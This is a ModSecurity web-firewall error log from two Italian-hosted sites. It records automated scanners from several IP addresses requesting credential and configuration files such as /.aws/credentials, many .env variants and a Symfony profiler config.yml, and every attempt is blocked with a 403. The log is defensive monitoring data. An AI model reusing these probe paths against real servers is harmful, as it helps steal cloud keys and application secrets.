[Mon Aug 25 06:08:09.519030 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aKvhqbtVUX2n2FxK3s0XawAAAAA"]
[Mon Aug 25 06:08:09.519419 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aKvhqbtVUX2n2FxK3s0XawAAAAA"]
[Mon Aug 25 06:08:09.519593 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aKvhqbtVUX2n2FxK3s0XawAAAAA"]
[Mon Aug 25 06:08:09.553817 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /myproject/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/myproject/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XbAAAAAA"]
[Mon Aug 25 06:08:09.554198 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/myproject/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XbAAAAAA"]
[Mon Aug 25 06:08:09.554419 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/myproject/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XbAAAAAA"]
[Mon Aug 25 06:08:09.593603 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.envs/.production/.django"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.envs/.production/.django"] [unique_id "aKvhqbtVUX2n2FxK3s0XbQAAAAA"]
[Mon Aug 25 06:08:09.594012 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.envs/.production/.django"] [unique_id "aKvhqbtVUX2n2FxK3s0XbQAAAAA"]
[Mon Aug 25 06:08:09.594209 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.envs/.production/.django"] [unique_id "aKvhqbtVUX2n2FxK3s0XbQAAAAA"]
[Mon Aug 25 06:08:09.627739 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XbgAAAAA"]
[Mon Aug 25 06:08:09.628143 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XbgAAAAA"]
[Mon Aug 25 06:08:09.628336 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env"] [unique_id "aKvhqbtVUX2n2FxK3s0XbgAAAAA"]
[Mon Aug 25 06:08:09.661580 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /react-app/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env.production"] [unique_id "aKvhqbtVUX2n2FxK3s0XbwAAAAA"]
[Mon Aug 25 06:08:09.661960 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env.production"] [unique_id "aKvhqbtVUX2n2FxK3s0XbwAAAAA"]
[Mon Aug 25 06:08:09.662137 2025] [:error] [pid 2215383] [client 91.169.13.169:37205] [client 91.169.13.169] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/react-app/.env.production"] [unique_id "aKvhqbtVUX2n2FxK3s0XbwAAAAA"]
[Mon Aug 25 07:59:01.758851 2025] [:error] [pid 2215385] [client 38.114.123.26:56674] [client 38.114.123.26] ModSecurity: Warning. Matched phrase "config.yml" at ARGS:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: config.yml found within ARGS:file: app/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aKv7pQ3mdbOrRgPGA3Vg0AAAAAI"]
[Mon Aug 25 07:59:01.759295 2025] [:error] [pid 2215385] [client 38.114.123.26:56674] [client 38.114.123.26] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aKv7pQ3mdbOrRgPGA3Vg0AAAAAI"]
[Mon Aug 25 07:59:01.759459 2025] [:error] [pid 2215385] [client 38.114.123.26:56674] [client 38.114.123.26] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aKv7pQ3mdbOrRgPGA3Vg0AAAAAI"]
[Mon Aug 25 11:49:02.573502 2025] [:error] [pid 2218428] [client 195.178.110.109:41194] [client 195.178.110.109] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aKwxjma_XXeCKRmm8lt4CQAAAAY"]
[Mon Aug 25 11:49:02.573765 2025] [:error] [pid 2218428] [client 195.178.110.109:41194] [client 195.178.110.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aKwxjma_XXeCKRmm8lt4CQAAAAY"]
[Mon Aug 25 11:49:02.573919 2025] [:error] [pid 2218428] [client 195.178.110.109:41194] [client 195.178.110.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aKwxjma_XXeCKRmm8lt4CQAAAAY"]
[Mon Aug 25 11:49:02.684906 2025] [:error] [pid 2215385] [client 195.178.110.109:41206] [client 195.178.110.109] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aKwxjg3mdbOrRgPGA3Vg3AAAAAI"]
[Mon Aug 25 11:49:02.685139 2025] [:error] [pid 2215385] [client 195.178.110.109:41206] [client 195.178.110.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aKwxjg3mdbOrRgPGA3Vg3AAAAAI"]
[Mon Aug 25 11:49:02.685292 2025] [:error] [pid 2215385] [client 195.178.110.109:41206] [client 195.178.110.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aKwxjg3mdbOrRgPGA3Vg3AAAAAI"]
[Mon Aug 25 11:49:02.832801 2025] [:error] [pid 2219597] [client 195.178.110.109:41222] [client 195.178.110.109] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aKwxjugDfPKZyTTlp1iBTwAAAAk"]
[Mon Aug 25 11:49:02.833027 2025] [:error] [pid 2219597] [client 195.178.110.109:41222] [client 195.178.110.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aKwxjugDfPKZyTTlp1iBTwAAAAk"]
[Mon Aug 25 11:49:02.833199 2025] [:error] [pid 2219597] [client 195.178.110.109:41222] [client 195.178.110.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aKwxjugDfPKZyTTlp1iBTwAAAAk"]
[Mon Aug 25 11:49:02.982117 2025] [:error] [pid 2215386] [client 195.178.110.109:41238] [client 195.178.110.109] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aKwxjmC_NR9zb_l6svnhegAAAAM"]
[Mon Aug 25 11:49:02.982368 2025] [:error] [pid 2215386] [client 195.178.110.109:41238] [client 195.178.110.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aKwxjmC_NR9zb_l6svnhegAAAAM"]
[Mon Aug 25 11:49:02.982520 2025] [:error] [pid 2215386] [client 195.178.110.109:41238] [client 195.178.110.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aKwxjmC_NR9zb_l6svnhegAAAAM"]
[Mon Aug 25 11:49:03.122390 2025] [authz_core:error] [pid 2219596] [client 195.178.110.109:41248] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Mon Aug 25 11:49:03.238807 2025] [:error] [pid 2215384] [client 195.178.110.109:41264] [client 195.178.110.109] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aKwxj93kx1L8Nrl0oO7EoAAAAAE"]
[Mon Aug 25 11:49:03.239043 2025] [:error] [pid 2215384] [client 195.178.110.109:41264] [client 195.178.110.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aKwxj93kx1L8Nrl0oO7EoAAAAAE"]
[Mon Aug 25 11:49:03.239235 2025] [:error] [pid 2215384] [client 195.178.110.109:41264] [client 195.178.110.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aKwxj93kx1L8Nrl0oO7EoAAAAAE"]
[Mon Aug 25 11:49:04.016906 2025] [:error] [pid 2218428] [client 195.178.110.109:41318] [client 195.178.110.109] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aKwxkGa_XXeCKRmm8lt4CgAAAAY"]
[Mon Aug 25 11:49:04.017159 2025] [:error] [pid 2218428] [client 195.178.110.109:41318] [client 195.178.110.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aKwxkGa_XXeCKRmm8lt4CgAAAAY"]
[Mon Aug 25 11:49:04.017314 2025] [:error] [pid 2218428] [client 195.178.110.109:41318] [client 195.178.110.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aKwxkGa_XXeCKRmm8lt4CgAAAAY"]
[Mon Aug 25 11:49:04.111032 2025] [:error] [pid 2215385] [client 195.178.110.109:41324] [client 195.178.110.109] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aKwxkA3mdbOrRgPGA3Vg3QAAAAI"]
[Mon Aug 25 11:49:04.111262 2025] [:error] [pid 2215385] [client 195.178.110.109:41324] [client 195.178.110.109] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aKwxkA3mdbOrRgPGA3Vg3QAAAAI"]
[Mon Aug 25 11:49:04.111419 2025] [:error] [pid 2215385] [client 195.178.110.109:41324] [client 195.178.110.109] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aKwxkA3mdbOrRgPGA3Vg3QAAAAI"]
[Mon Aug 25 11:49:04.207725 2025] [:error] [pid 2219597] [client 195.178.110.109:41334] [client 195.178.110.109] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aKwxkOgDfPKZyTTlp1iBUAAAAAk"]
